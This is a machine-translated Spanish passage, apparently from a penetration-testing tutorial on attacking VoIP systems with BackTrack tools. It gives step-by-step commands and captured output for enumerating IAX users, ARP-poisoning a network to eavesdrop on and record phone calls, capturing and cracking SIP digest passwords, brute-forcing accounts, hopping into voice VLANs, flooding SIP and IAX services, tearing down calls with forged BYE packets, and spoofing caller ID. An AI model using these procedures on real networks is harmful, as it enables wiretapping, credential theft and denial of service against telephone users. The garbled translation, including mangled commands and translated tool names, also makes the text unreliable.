root @ bt :/ pentest / voip / enumiax #. / enumiax enumIAX 1,0 Dustin D. Trammell Uso: enumiax [opciones] destino opciones: -D Diccionario ataque con expediente -I Intervalo para auto-save (nmero de operaciones, por defecto 1000) -M # nombre de usuario mnima (en caracteres) -M # nombre de usuario mximo (en caracteres) -R # lmite de velocidad de las llamadas (en microsegundos) -S Leer el estado de sesin de archivo de estado -V verbosidad Incremento (repeticin de verbosidad adicional) -V Imprimir informacin de versin y salir -H help Imprimir / uso de la informacin y de salida root @ bt :/ pentest / voip / enumiax #. / enumiax-v-M3-M3 192.168.1.104 enumIAX 1,0 Dustin D. Trammell Objetivo adquirido: 192.168.1.104 Conexin a 192.168.1.104 a travs de UDP en el puerto 4569 ... Iniciar el proceso de enumeracin en: Jue 05 de febrero 2011 13:04:18 Ahora trabaja en 3 nombres de usuario de caracteres ... ################# Tratando nombre de usuario: "000" ################# Tratando nombre de usuario: "001" ################# Tratando nombre de usuario: "002" ################# Tratando nombre de usuario: "003" ################# Tratando nombre de usuario: "004" ################# Tratando nombre de usuario: "005" ################# Tratando nombre de usuario: "006" ################# Tratando nombre de usuario: "007" ################# Tratando nombre de usuario: "008" ################# ... ################ ################ ################ ################ ################ ################ ################ ################ ################ ################

root @ bt :/ pentest / voip / enumiax #. / enumiax dict-d-v 192.168.1.104 enumIAX 1,0

Dustin D. Trammell Objetivo adquirido: 192.168.1.104 Conexin a 192.168.1.104 a travs de UDP en el puerto 4569 ... Iniciar el proceso de enumeracin en: Jue 05 de febrero 2011 13:02:39 ##################### Tratando de usuario: "guest" ##################### Tratando nombre de usuario: "iaxtel" ##################### Tratando nombre de usuario: "iaxtel2" ##################### Tratando de usuario: "100" ##################### Tratando nombre de usuario: "101" ##################### Tratando nombre de usuario: "200" ##################### Tratando nombre de usuario: "201" ##################### Tratando de usuario: "202" ##################### Tratando nombre de usuario: "203" Fin del archivo de diccionario alcanzado, salir. ############ ############ ############ ############ ############ ############ ############ ############ ############

Monitoreo de trfico y llamadas telefnicas espionaje


Supervisar el trfico de VoIP puede permitir a un atacante capturar las solicitudes de SIP y RTP datos enviados desde los clientes al servidor y viceversa. Se puede servir a dos tipos de ataque: La captura de autenticacin SIP (que ms tarde se discuta este tema en la seccin de autenticacin atacando). Usuarios escuchas ilegales llamadas telefnicas. A efectos de clculo se utilizar el siguiente escenario:

Para este tipo de ataque que tendr que realizar un hombre en medio del ataque que se requieren los siguientes pasos: Arp intoxicacin / spoofing Oler el trfico Decodificacin RTP datos a un archivo de audio.

Envenenamiento ARP mediante arpspoof


Antes de que podamos comenzar a rastrear el trfico tendremos que nuestro veneno arp switch / puerta de enlace, vamos a utilizar una herramienta llamada "arpspoof" que se encuentra en "/ usr / sbin /

arpspoof" carpeta en Backtrack, de hecho slo puede invocarlo desde cualquier lugar, escribiendo: arpspoof Antes de poder utilizar arpspoof tendremos que activar el reenvo IP:
root @ bt: ~ # echo 1> / proc/sys/net/ipv4/ip_forward

Sintaxis arpspoof debera tener el siguiente aspecto:


root @ bt: ~ # arpspoof Versin: 2,4 Uso: arpspoof [-i interface] [-t target] anfitrin

Durante un ataque MITM xito tendremos que suplantar en ambos sentidos:


arpspoof-t vctima de puerta de enlace arpspoof-t gateway vctima

Dejaremos que nuestro envenenamiento ARP ejecutarse en segundo plano mientras se realiza una captura con Wireshark.

La captura de trfico y espionaje usando Wireshark


Ahora vamos a encender Wireshark para capturar algo de trfico. Vamos a utilizar el siguiente filtro Wireshark captura:
no transmitir y no multicast y el anfitrin 192.168.1.118

Ahora vamos a empezar a capturar algo de trfico ... Si bien para olfatear el trfico de usuario "B" ha puesto en marcha el telfono X-Lite suave en su computadora de escritorio y marc el usuario "A" extensin 200.

Wireshark ha capturado algo de trfico, despus de un tiempo me he detenido el proceso de captura y se guarda las sesiones en un archivo llamado "sip.pcap".

Podemos ver que hemos capturado el trfico SIP, pero para esta seccin estn ms interesados en el trfico RTP, ya que contiene los datos reales de conversacin.

Wireshark tiene una caracterstica muy bien para decodificar llamadas VoIP capturados los datos en formato de audio reproducibles Usted puede encontrar esta caracterstica en las estadsticas -> Llamadas VoIP men.

Voipong
Voipong es una utilidad que detecta todas las llamadas de voz sobre IP en una tubera, y para aquellos que estn G711 codificado, los vertederos de conversacin real a archivos de onda diferentes. Es compatible con SIP, H323, protocolo de cliente de Cisco Delgado, RTP y RTCP. Voipong se encuentra en retroceso "/ pentest / voip / voipong" directorio Antes de poder utilizar voipong tendremos que hacer algunos cambios en el archivo voipong.conf:
root @ bt :/ pentest / voip / voipong # nano / etc voipong.conf soxpath = / usr / bin / sox networksfile = / pentest / voip / voipong / etc / voipongnets outdir = / pentest / voip / voipong / salida / device = eth0 # su tarjeta de interfaz de red nombre

Ahora podemos empezar a capturar voipong algunas conversaciones VoIP


root @ bt :/ pentest / voip / voipong #. / voipong-c / etc voipong.conf-d4-f

Una vez voipong detecta una llamada de telfono se iniciar capturarlo una vez que termine de voipong se detendr el proceso de captura y lo hacen a un fichero wave jugable. Toda la conversacin se guardar en el directorio "/ pentest / voip / voipong / salida" carpeta

Reproduccin del archivo:

Vomitar
Vomit convierte un telfono Cisco IP RTP conversacin en un archivo de sonido que se puede jugar con los jugadores sanos normales. Vomit requiere un archivo de salida de tcpdump. Con el fin de obtener vomitar en marcha tendremos que descargar e instalar WavePlay Consguelo aqu: http://dir.filewatcher.com/d/FreeBSD/distfiles/Other/waveplay-20010924.tar.gz.5731.html
root @ bt: ~ # tar-xzvf WavePlay-20010924.tar.gz WavePlay-20010924 /

waveplay-20010924/Makefile waveplay-20010924/waveplay.c waveplay-20010924/waveplay.ja.1 waveplay-20010924/wavefmt.h waveplay-20010924/README waveplay-20010924/waveplay.1 waveplay-20010924/README.jp root @ bt: ~ # cd WavePlay-20010924 root @ bt: ~ / WavePlay-20010924 # make cc-c-o waveplay.o waveplay.c waveplay.o cc-o WavePlay root @ bt: ~ / WavePlay-20010924 # cp WavePlay / usr / bin / root @ bt :/ pentest / voip / vmito # / vmitos sip.dump r |. WavePlay-S8000-B16-C1

UCsniff
UCSniff es un video de VoIP e IP Seguridad herramienta de evaluacin que integra el software de cdigo abierto que existe en varias caractersticas tiles, lo que permite VoIP y Video IP propietarios y profesionales de seguridad a prueba rpidamente por la amenaza de espionaje no autorizado VoIP y Video. UCSniff apoya envenenamiento ARP, VLAN Hopping, VLAN descubrimiento a travs de CDP, tiene una capacidad de rastreadores y ms ... Lo considero como un todo en una herramienta de espionaje. Echemos un vistazo a algunos ejemplos de uso: UCSniff puede operar en los modos 2 Modo Monitor - En caso de ser utilizado en un medio compartido donde los telfonos IP conectados a saber: un HUB, punto de acceso inalmbrico, se puede tambin utilizar en un entorno conmutado mediante el establecimiento de una sesin SPAN en un switch Cisco. Hombre en el modo medio - Este modo tiene 2 modos adicionales que son Modo de aprendizaje Modo Dirigido Preparacin UCSniff por lo que puede ejecutar desde cualquier lugar de dar marcha atrs:
root @ bt :/ tmp # cd / pentest / voip / ucsniff / root @ bt :/ pentest / voip / ucsniff #. / configure root @ bt :/ pentest / voip / ucsniff # make root @ bt :/ pentest / voip / ucsniff # make install

Modo de uso del monitor


root @ bt :/ tmp / ucsniff # ucsniff-i eth0-M UCSniff 2,1 de partida Funcionamiento en modo monitor El archivo de directorio users.txt no puede ser abierto para lectura en el directorio de trabajo Targets.txt El archivo no se puede abrir para lectura en el directorio de trabajo Escuchando en eth0 ... (Ethernet) eth0 -> 00:0 C: 29:84:98: 192.168.1.105 255.255.255.0 B2

A partir Unificado oler ... Advertencia: Asegrese de que usted golpea 'q' cuando haya terminado con este programa. Advertencia: 'q' re-ARP a las vctimas. Si no lo hace antes de la salida del programa dar lugar a una denegacin de servicio. SIP llamada en curso. (Extensin 200, ip 192.168.1.104) llamando al (extensin 201, ip 192.168.1.118) SIP llamada en curso. (Extensin 200, ip 192.168.1.105) llamando al (extensin 201, ip 192.168.1.104) SIP Call terminado. Conversacin grabada en el archivo '200-Calling-201-5 :2:7-3-dos. Wav ' SIP Call terminado. Conversacin grabada en el archivo '200-Calling-201-5 :2:8-2-dos. Wav ' Cierre de interfaz de texto ... Unificado olfateando se detuvo.

Podemos parar las sesiones pulsando la tecla Q. Varios archivos han sido creados por UCSniff: Los archivos de registro - Contiene informacin detallada sobre los archivos PCAP transacciones sip - archivo de captura que se puede ver en Wireshark audio wav - archivos de las conversaciones de audio
root @ bt :/ tmp / ucsniff # ls-l total de 376 -Rw-r - r -. 1 root root 40854 05 de febrero 05:02 200 Calling-201-5 :2:7-3-ambos wav -Rw-r - r -. 1 root root 115818 05 de febrero 05:02 200 Calling-201-5 :2:7-3 pcap -Rw-r - r -. 1 root root 46294 05 de febrero 05:02 200 Calling-201-5 :2:8-2-wav tanto -Rw-r - r -. 1 root root 103940 05 de febrero 05:02 200 Calling-201-5 :2:8-2 pcap -Rw-r - r - 1 root root 278 05 de febrero 05:02 call_detail_log -Rw-r - r - 1 root root 317 05 de febrero 05:02 call_log -Rw-r - r - 1 root root 10063 05 de febrero 05:02 sip.log -Rw-r - r - 1 root root 39073 05 de febrero 05:02 sipdump.pcap -Rw-r - r - 1 root root 0 05 de febrero 05:01 skinny_log

MITM Learning Modo de uso: Este modo utiliza un protocolo de sealizacin (SIP, Skinny) para asignar extensiones a un direcciones IP. Puede personalizar los objetivos para interceptar slo direcciones IP especficas o redes. En el siguiente ejemplo se supone que estamos en el UCSniff VoIP VLAN Arp envenenar a todos los hosts de la subred.
root @ bt :/ tmp / ucsniff # ucsniff-i eth0 / / / / UCSniff 2,1 escuchar a partir del eth0 ... (Ethernet) eth0 -> 00:0 C: 29:84:98: 192.168.1.105 255.255.255.0 B2 Asignaron al azar a 255 hosts para la digitalizacin de ... El escaneo de la mscara de red total para 255 hosts ... * | ================================================ ==> | 100,00% vctimas de envenenamiento ARP: Grupo 1: Cualquier grupo (todos los hosts de la lista) 2: ANY (todos los hosts de la lista) entrada asignada nuevo objetivo: (IP: 192.168.1.118) -> Extensin 201 y nombre: entrada asignada nuevo objetivo: (IP: 192.168.1.104) -> Extensin 200 y nombre: Llamada SIP en curso. (Extensin 201, ip 192.168.1.118) llamando al (extensin 200, ip 192.168.1.104) SIP Llamada finalizada. Conversacin grabada en el archivo '201-Calling-200-5 :13:4-2-dos. Interfaz wav 'Clausura de texto ... ARP envenenador desactivado. RE-ARPing las vctimas ... Unificado olfateando se detuvo.

Si echamos un vistazo a los archivos de registro UCSniff podemos ver los objetivos descubiertos utilizados en el ataque.
root @ bt :/ tmp / ucsniff # cat targets.txt 192.168.1.118,201, sip 192.168.1.104,200, sip

MITM modo de objetivo Target Mode permite espionaje en una capa superior que slo corrientes aleatorias de audio o la direccin IP de los telfonos para los que no conocen la extensin. Este modo tiene dos modos secundarios: El usuario Targeted Targeted Conversacin Podemos agregar destinos manualmente a la "targets.txt" archivo en el siguiente formato: xxxx, extensin, sip 192.168.1.118,201, SIP o utilizar el modo de aprendizaje para el descubrimiento automtico hosts
root @ bt :/ tmp / ucsniff # ucsniff-i eth0-T UCSniff 2,1 de partida Targets.txt El archivo no se puede abrir para lectura en el directorio de trabajo No hay objetivos han sido previamente descubierto en el archivo Targets, targets.txt Por favor, ejecute UCSniff en el modo de aprendizaje, o manualmente editar targets.txt

Una vez que un archivo vlido targets.txt se encuentra, se le pedir que seleccione un modo de escucha:
root @ bt :/ tmp / ucsniff # ucsniff-i eth0-T UCSniff 2,1 de partida Analizados 2 entradas en el archivo Targets, targets.txt UCSniff ejecuta en modo de destino. Analizada 2 objetivos previamente descubiertos Por favor, seleccione un modo de espionaje dirigida: 1. Usuario Descripcin: interceptar todas las llamadas desde o hacia un punto final determinado. 2. Conversacin Descripcin: espiar a los flujos de conversacin bidireccional entre dos puntos finales seleccionados. Por favor, seleccione la opcin (1) o (2):

Si selecciona "Usuario" indica a la herramienta para interceptar todo el trfico entre el Blanco, y el resto de la red.

En "Conversacin", dos puntos finales se seleccionan y la red es ARP envenenada para interceptar slo el trfico entre los dos usuarios.

UCSniff incluye las herramientas ms tiles y los ataques de los modos como el salto de VLAN (usando ACE) que se discutirn ms adelante.

Xplico
Aunque Xplico no est en el directorio Backtrack voip herramientas, es una herramienta muy til para capturar trfico SIP y RTP (entre otros protocolos). Xplico se puede encontrar en el Backtrack -> Digital Forensics - men Herramientas> Anlisis Forense

En caso de que no est presente en la instalacin Backtrack slo tiene que instalar con el comando siguiente:
root @ bt: ~ # apt-get install xplico

Xplico se puede utilizar para capturar trfico en tiempo real o importar un archivo PCAP Wireshark captura. De cualquier manera Xplico decodificar los paquetes capturados y les montamos en el formato adecuado en nuestro caso ser SIP y RTP. Despus de ejecutar Xplico le pedir que inicie sesin, el nombre de usuario y contrasea por defecto son: xplico

Una vez que haya iniciado sesin para Xplico tendremos que crear un caso

Tendremos que elegir entre una captura vivo o importar un archivo PCAP En este ejemplo vamos a utilizar Xplico para realizar una captura en vivo (vamos a Arp envenenar nuestros objetivos en segundo plano usando arpspoof). Ahora tendremos que elegir nuestro caso y crear una nueva sesin

Al elegir nuestra sesin recin creada veremos nuestra pgina de estadsticas principal con la opcin de elegir nuestro adaptador de red e iniciar / detener el proceso de captura.

Aqu hay un ejemplo para el trfico capturado SIP:

Un ejemplo para el trfico RTP decodificado:

La captura de autenticacin SIP utilizando SIPDump


SIPDump es parte de la suite de herramientas SIPCrack, permite realizar una captura en vivo de autenticacin SIP respuesta digest o puede volcar una sesin previamente capturados desde un archivo

PCAP. SIPDump uso:


root @ bt :/ pentest / voip / sipcrack #. / sipdump-i eth0 SIPdump 0,3 (MaJoMu | www.codito.de) --------------------------------------Uso: sipdump [OPCIONES] = Archivo donde logins capturados se escribir en Opciones: -I = Interfaz para escuchar en -P = Pcap utilizar el archivo de datos -M = introducir manualmente los datos de acceso -F " "= Conjunto libpcap filtro * Es necesario especificar el archivo de volcado

Vivo para capturar con SIPDump:


root @ bt :/ pentest / voip / sipcrack #. / sipdump-i eth0 auth.txt SIPdump 0,3 (MaJoMu | www.codito.de) --------------------------------------* El uso de 'eth0' dev para oler * Empieza a oler con 'tcp o udp o vlan' filtro de paquetes * Dumped inicio de sesin desde 192.168.1.104 -> 192.168.1.111 (Usuario: '200 ') * Dumped inicio de sesin desde 192.168.1.104 -> 192.168.1.111 (Usuario: '200 ') * Dumped inicio de sesin desde 192.168.1.104 -> 192.168.1.111 (Usuario: '200 ')

Dumping datos de autenticacin de un archivo PCAP


root @ bt :/ pentest / voip / sipcrack #. / sipdump-p / root / registration.pcap auth.txt SIPdump 0,3 (MaJoMu | www.codito.de) --------------------------------------* El uso de pcap file '/ root / registration.pcap' para oler * Empieza a oler con 'tcp o udp o vlan' filtro de paquetes * Dumped inicio de sesin desde 192.168.1.104 -> 192.168.1.101 (Usuario: '200 ') * Al salir, olfate un inicio de sesin

SIPDump a escribir la respuesta al desafo de autenticacin en el archivo especificado que se ve de la siguiente manera: Vamos a disscuss agrietamiento estos desafos en el captulo autenticacin contrario.

Atacar autenticacin
SIP puede ser susceptible a dos tipos de ataques de autenticacin, antes de echar un vistazo a estos ataques tipo vamos a entender cmo es un registro SIP y el proceso de autenticacin se lleva a cabo. SIP utiliza una autenticacin implcita que es un mecanismo que utiliza el protocolo HTTP y conocido como HTTP digest. Debido a que SIP es un protocolo basado en ASCII los detalles de autenticacin son ordenadas con el fin de evitar el transporte en texto claro. Cuando un cliente SIP (User Agent) quiere autenticar con un servidor SIP, el servidor genera y enva un desafo digest al cliente, que contiene los siguientes parmetros:

Realm - se usa para identificar las credenciales dentro como mensaje SIP, por lo general es el dominio SIP Nonce -. Esto es una cadena md5 nico que es generado por el servidor para cada solicitud de registro que est hecho de un sello de tiempo y una frase secreta para asegurar tiene una vida til limitada y no se poda ser utilizado de nuevo. Una vez que el cliente recibe el desafo digest y el usuario introduce sus credenciales el cliente utiliza el nonce para generar una respuesta digest y lo enva de vuelta al servidor.

Dicho esto, vamos a tratar de descifrar la respuesta digest con el fin de obtener una contrasea vlida de SIP cuenta.

Cracking SIP Digest hashes respuesta


Backtrack ofrece una gran herramienta llamada SIPCrack, Ya hemos discutido cmo capturar una autenticacin vlida SIP compendio de respuestas utilizando SIPDump. SIPCrack se puede encontrar en
root @ bt :/ pentest / voip / sipcrack #

SIPCrack uso:
root @ bt :/ pentest / voip / sipcrack #. / sipcrack SIPcrack 0,3 (MaJoMu | www.codito.de) ---------------------------------------Uso: sipcrack [opciones] [-s |-w ] Logins = Archivo que contiene olfate por Opciones SIPdump:-s = stdin uso de contraseas lista de palabras-w = archivo que contiene todas las contraseas a probar-p num = proceso de impresin de craqueo contraseas cada n (-w) (ATENCIN: se ralentiza en gran medida) * O -w o-s tiene que ser dada

SIPCrack puede funcionar en dos modos: Ataque de diccionario STDIN

Ataque de diccionario Backtrack ofrece algunos diccionarios bsicos que se encuentran en:
root @ bt :/ pentest / passwords / listas de palabras

Sin embargo, para el propsito de este artculo voy a utilizar otra herramienta en la parrilla Crunch retroceder llamada que se utiliza para crear diccionarios personalizados. Vamos a utilizar para crear un crujido crujido seis caracteres numricos diccionario se encuentra en:

root @ bt :/ pentest / passwords / crunch #

Crunch de uso:
uso: crunch [-F / ruta / a / charset.lst charset-name] [-o wordlist.txt] [-t [FIXED] @ @ @ @] [-s Startblock] [-c nmero]

Para el uso crujido detallado comprobar su manual:


root @ bt :/ pentest / passwords / crunch crunch hombre #

Creacin de un diccionario de seis caracteres numricos:

root @ bt :/ pentest / passwords / crunch #. / crunch 6 6-f charset.lst numrico-o / pentest / voip / sipcrack / sipass.txt Crunch generar ahora 7000000 bytes de datos Crunch ahora generar 6 MB de datos Crunch ahora genera 0 GB de datos 100%

Vamos a utilizar un credenciales previamente capturados por SIPDump sip almacenados en el archivo auth.txt ans sipass.txt como diccionario (que hemos creado utilizando crunch)
Descifrando la respuesta Digest:

root @ bt :/ pentest / voip / sipcrack #. / sipcrack-w auth.txt sipass.txt SIPcrack 0,3 (MaJoMu | www.codito.de) ---------------------------------------* Se encuentra Cuentas: Num Cliente Servidor Hash usuario | contrasea 1 192.168.1.101 192.168.1.104 200 3a33e768ed6f630347f4b511371926bd * Seleccione la entrada de roer (1 - 1): 1 * Generacin de hash MD5 esttica ... 0a84f78fde66bb15197eab961462dc2f * A partir de fuerza bruta contra el usuario '200 '(MD5: '3 a33e768ed6f630347f4b511371926bd') * Lista de palabras Cargado: 'sipass.txt' * A partir de fuerza bruta contra el usuario '200 '(MD5: '3 a33e768ed6f630347f4b511371926bd') * Se ha intentado 123457 contraseas en 0 segundos * Contrasea Encontrados: '123456 ' * Actualizacin del archivo de volcado 'auth.txt' ... hecho

Ataque de fuerza bruta con John The Ripper Para este modo de ataque que usaremos John the ripper para redirigir la salida johns en el archivo FIFO que vamos a alimentar a SIPCrack. Creacin de un archivo FIFO:
root @ bt :/ tmp # mkfifo sipcrack

Generando contraseas usando john y redirigir la salida a nuestro fichero FIFO, para este ejemplo vamos a generar hasta 6 dgitos solamente.
root @ bt: ~ # john [*] Este script le llevar a / pentest / passwords / jtr / [*] A partir de ah, ejecute. / John root @ bt :/ pentest / passwords / JTR # / john -. incremental = dgitos-stdout = 6> / tmp / sipcrack

Utilizando el archivo FIFO para romper la clave:


root @ bt :/ pentest / voip / sipcrack #. / sipcrack-w / tmp / sipcrack auth.txt SIPcrack 0,3 (MaJoMu | www.codito.de) ---------------------------------------* Se encuentra Cuentas: Num Cliente Servidor Hash usuario | contrasea 1 192.168.1.111 192.168.1.104 200 8edc2d549294f6535070439fb069c968 * Seleccione la entrada de roer (1 - 1): 1 * Generacin de hash MD5 esttica ... 0a84f78fde66bb15197eab961462dc2f * A partir de fuerza bruta contra el usuario '200 '(MD5: '8 edc2d549294f6535070439fb069c968') * Lista de palabras Cargado: '/ tmp / sipcrack' * A partir de fuerza bruta contra el usuario '200 '(MD5: '8 edc2d549294f6535070439fb069c968') * Se ha intentado tres contraseas en 0 segundos * Contrasea Encontrados: '123456 ' * Actualizacin del archivo de volcado 'auth.txt' ... hecho

Ataques de fuerza bruta SIP Cuentas


Podemos utilizar svcrack que forma parte de la suite de herramientas sipvicious a la fuerza bruta sorbo representa una nica cuenta SIP ataque de diccionario (Usted puede agregar un v-o-vv para mostrar ms informacin):
root @ bt :/ pentest / voip / sipvicious #. / svcrack.py-u200-d 192.168.1.104 wordlist.txt | Extensin | Contrasea | -----------------------| 200 | 123456 |

Una sola cuenta SIP bruta obligando a:


root @ bt :/ pentest / voip / sipvicious #. / svcrack.py-u200-r100000-999999 192.168.1.104 | Extensin | Contrasea | -----------------------| 200 | 123456 |

Usar. / Svcrack-h para todos los argumentos disponibles.

VLAN Hopping
Por lo general, el trfico de VoIP se conecta a una VLAN dedicada (Virtual LAN), como vimos en la seccin topologas. Esto significa que no se puede interceptar el trfico de VoIP por inhalacin e

intoxicacin Arp. La razn de ello es que una VLAN es como una red independiente, tiene su propio dominio de broadcast y rango de IP diferente a la red de datos. VLAN salto es una forma de "saltar" a otra VLAN, por suerte para nosotros Backtrack incluye las herramientas necesarias para llevar a cabo este ataque. Una topologa comn es cuando el telfono IP tiene un built-in "Switch interno", por lo general el PC est conectado a la toma PC y el telfono mvil se conecta desde su lan / sw socket con el conmutador de red de la siguiente manera:

Un conmutador CISCO tpica configuracin de puertos para VoIP se ver algo como:
Switch # conf t Introduzca los comandos de configuracin, uno por lnea. Terminar con CTRL / Z. Switch (config) # interface FastEthernet 0/1 Switch (config-if) # switchport modo de acceso Switch (config-if) # switchport access vlan 10 Switch (config-if) # switchport voz vlan 20

El telfono IP se configurar con la ID de VLAN correspondiente (20) y el trfico de datos PC fluir a travs de la VLAN 10. Antes de comenzar saltando alrededor, tendremos que activar el soporte para el protocolo 802.1q en Backtrack escribiendo:
root @ bt: ~ # modprobe 8021q

VoIP Hopper
VoIP tolva se utiliza para saltar a la VLAN de voz por comportarse como un telfono IP, soporta conmutadores especficos y es compatible con algunos modelos de telfonos IP. Actualmente soporta las marcas como: Cisco, Avaya y Nortel. VoIP tolva fue diseado para ejecutarse en Backtrack Linux y actualmente cuenta con las siguientes caractersticas: DHCP Client, generador de CDP, la suplantacin de direcciones MAC y VLAN salto. Voiphopper uso:
root @ bt :/ pentest / voip / voiphopper #. / voiphopper voiphopper-i <interface>-c {0 | 1 | 2}-a-n-v <VLANID> Por favor, especifique una opcin de modo de base: CDP Sniff Mode (-c 0) Ejemplo: voiphopper-i eth0-c 0 CDP Spoof modo de paquete personalizado (-c 1): -D (ID de dispositivo) -P (Port ID) -C (Capacidades) -L (Plataforma) -S (Software) -U (Duplex) Ejemplo: voiphopper-i eth0-c 1-E 'SIP00070EEA5086'-P 'Port 1' Host-C-L 'Cisco IP Phone 7940'-S 'P003-08-8-00-1-U CDP Spoof modo de pre-hechos paquetes (-c 2) Ejemplo: voiphopper-i eth0-c 2 Avaya modo DHCP Opcin (-a):

Ejemplo: voiphopper-i eth0-a Modo VLAN Hop (-v ID de VLAN): Ejemplo: voiphopper-i eth0-v 200 Nortel modo DHCP Opcin (-n): Ejemplo: voiphopper-i eth0-n

VoIP Hopper ofrece muchos modos de ataque por favor utiliza el h-para obtener informacin detallada. Echemos un vistazo a un ejemplo de la inhalacin de CDP y ejecutar un salto de VLAN en la VLAN de voz en un entorno de Cisco. Ejecutar VoIP Hopper en la interfaz de Ethernet, de la siguiente manera:
root @ bt :/ pentest / voip / voiphopper #. / voiphopper-i eth0-c 0

VoIP Hopper tambin le permite a uno Hop VLAN a VLAN arbitraria, sin oler a CDP. Si usted ya conoce la voz VLAN ID o le gustara Hop VLAN a otra VLAN slo tiene que especificar el ID de VLAN.
root @ bt :/ pentest / voip / voiphopper #. / voiphopper-i eth0-v 20 VoIP Hopper 1,00 Ejecucin en modo VLAN Hop ~ Tratar de saltar a la VLAN 2 Aadido VLAN 20 a la interfaz eth0 Intentando dhcp solicitud de nueva interfaz eth0.20 eth0.20 Enlace encap: Ethernet HWaddr 00:0 c: 29:84:98: b2 inet6 addr: fe80 :: 20c: 29ff: FE84: 98b2/64 Alcance: Enlace UP NOTRAILERS BROADCAST RUNNING MULTICAST MTU: 1500 Mtrica: 1 RX packets: 0 errores: 0 cado: 0 sobrecostos: 0 frame: 0 TX paquetes: 9 errores: 0 cado: 0 sobrecostos: 0 carrier: 0 colisiones: 0 txqueuelen: 0 RX bytes: 0 (0.0 B) TX bytes: 2274 (2.2 KB)

ACE
ACE es una herramienta ms para VLAN salto muy similar a Voiphopper en el uso e incluyen una opcin para descubrir tambin los servidores de TFTP (servidores de configuracin). ACE uso:
root @ bt :/ pentest / voip / as #. / as ACE v1.0: Automated corporativa (Datos) Enumerator Uso: as [-i interface] [-m mac address] [-t servidor tftp direccin ip |-c modo cdp |-v voz vlan id |-r interfaz vlan |-d modo verbose] -I <interface> (Obligatorio) Interfaz para olfatear / envo de paquetes -M MAC> (Obligatorio) Direccin MAC del telfono IP vctima -T <tftp servidor ip> (Opcional) Servidor tftp direccin IP -C <cdp modo 0|1> (opcional) 0 CDP oler modo, un modo de parodia CDP -V <Voice vlan <id (Opcional) Introduzca la ID de VLAN de voz -R <vlan usuario> (opcional) Elimina la interfaz VLAN -D (Opcional) verbose | modo de depuracin

Puede agregar manualmente un salto de VLAN o utilizar su funcin de descubrimiento


Modo para especificar el ID de VLAN de voz Ejemplo: As-i eth0-v 96 m 00:1 E: F7: 28:9 C: 8E Modo para auto-descubrir ID VLAN de voz en el modo de audicin para CDP Ejemplo: As-i eth0-c 0-m 00:1 E: F7: 28:9 C: 8E Modo para auto-descubrir ID VLAN de voz en el modo de suplantacin para CDP Ejemplo: As-i eth0-c 1-m 00:1 E: F7: 28:9 C: 8E

TIP: Para ver la direccin MAC en uso marcha atrs:


root @ bt: ~ # macchanger-s eth0

No importa si se ha utilizado o voiphopper as ahora se puede interceptar el trfico de VoIP con herramientas como "ucsniff" especificando que acaba de crear la interfaz. Por ejemplo:
root @ bt :/ pentest / voip / ucsniff # ucsniff-i eth0.20 / / / /

Denial Of Service
Un ataque de denegacin de servicio en los servicios de VoIP puede hacerlo intil, causando un dao intencional a la red y la disponibilidad de los sistemas de VoIP. Este ataque puede ocurrir en dos niveles, ataques de red estndar DoS y ataques especficos de VoIP DOS. Generalmente se enviar toneladas de datos por la inundacin de la red para consumir todos sus recursos o un protocolo especfico con el fin de saturar con toneladas de peticiones. Vamos a echar un vistazo rpido de las herramientas disponibles en Backtrack

Inviteflood
Esta herramienta puede ser utilizada para inundar un objetivo con peticiones INVITE puede ser utilizada para combatir gateways SIP / apoderados y telfonos SIP.
root @ bt :/ pentest / voip / inviteflood #. / inviteflood inviteflood - Versin 2.0 09 de junio 2006 Uso: Obligatorio interfaz (por ejemplo eth0) usuario de destino (por ejemplo, "" o john.doe o 5000 o "1 +210-555-1212") dominio de destino (por ejemplo enterprise.com o una direccin IPv4) IPv4 addr objetivo de inundacin (ddd.ddd.ddd.ddd) inundacin etapa (es decir, nmero de paquetes) Opcional -Una inundacin herramienta "De:" alias (por ejemplo jane.doe)

I-IPv4 direccin IP de origen [por defecto es la direccin IP de la interfaz] -S srcport (0 - 65535) [por defecto es bien conocido puerto de descarte 9] -D DestPort (0 - 65535) [por defecto es bien conocido puerto SIP 5060] -L En lineString utilizado por SNOM [por defecto est en blanco] -S tiempo de sueo msgs btwn invitar (us) -H help - imprime este uso -V modo detallado salida

Una sintaxis de uso bsico es el siguiente:


. / Inviteflood eth0 target_extension target_domain target_ip number_of_packets

Mientras la herramienta mantiene inundando el gateway SIP, al evitar que los usuarios realicen llamadas telefnicas. You can flood the sip proxy with an inexistent extension thus making it generating a 404 not found just to keep it busy.

Rtpflood
Rtp flood is used to flood a target IP phone with a UDP packet contains a RTP data In order to launch a successful attack using rtpflood you will need know the RTP listening port on the remote device you want to attack, for example; x-lite sofphone default rtp port is 8000.
root@bt:/pentest/voip/rtpflood# ./rtpflood usage: ./rtpflood sourcename destinationname srcport destport numpackets seqno timestamp SSID

Iaxflood
IAXFlood es una herramienta para inundar el protocolo IAX2 que es utilizado por el asterisco PBX.
root@bt:/pentest/voip/iaxflood# ./iaxflood usage: ./iaxflood sourcename destinationname numpackets

Teardown
Teardown se utiliza para terminar una llamada mediante el envo de una peticin BYE
./teardown eth0 extension sip_proxy 10.1.101.35 CallID FromTag ToTag

First you will need to capture a valid sip OK response and use its from and to tags and a valid caller id

value.
SIP/2.0 200 OK Via: SIP/2.0/UDP 192.168.1.105; sucursal = z9hG4bKkfnyfaol, recibido = 192.168.1.105; rport = 5060 De: "200" ;tag=hcykd Para: "200" ;tag=as644fe807 Call-ID: jwtgckolqnoylqf@backtrack CSeq: 134 REGISTRO User-Agent: Asterisk PBX Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, CONSULTE, suscribir, NOTIFIQUE Compatible con: sustituye Expira: 3600 Contacto: ;expires=3600 Date: Tue, 01 Feb 2011 17:55:42 GMT Content-Length: 0

Si se especifica la opcin "-v" opcin se puede ver la carga til:


SIP carga til para paquetes: BYE sip:200@192.168.1.104:5060 SIP/2.0 Via: SIP/2.0/UDP 192.168.1.105:9; sucursal = 91ca1ba5-98ee-44d5-9170-61c30981c565 De: <sip:192.168.1.104>; tag = hcykd To: 200 <sip:200@192.168.1.104>;tag=as644fe807 Call-ID: jwtgckolqnoylqf@backtrack CSeq: 2000000000 BYE Max-Forwards: 16 User-Agent: Hacker Content-Length: 0 Contact: <sip:192.168.1.105:9>

Spoofing Caller ID
Existen varios mtodos para la identificacin de llamadas spoofing que no vamos a discutir aqu, ya que requiere un conjunto diferente de herramientas y equipos que no son relevantes para este propsito artculo. Caller ID Spoofing en SIP es bastante fcil, slo tiene que cambiar la peticin SIP "INVITE" de cabecera.
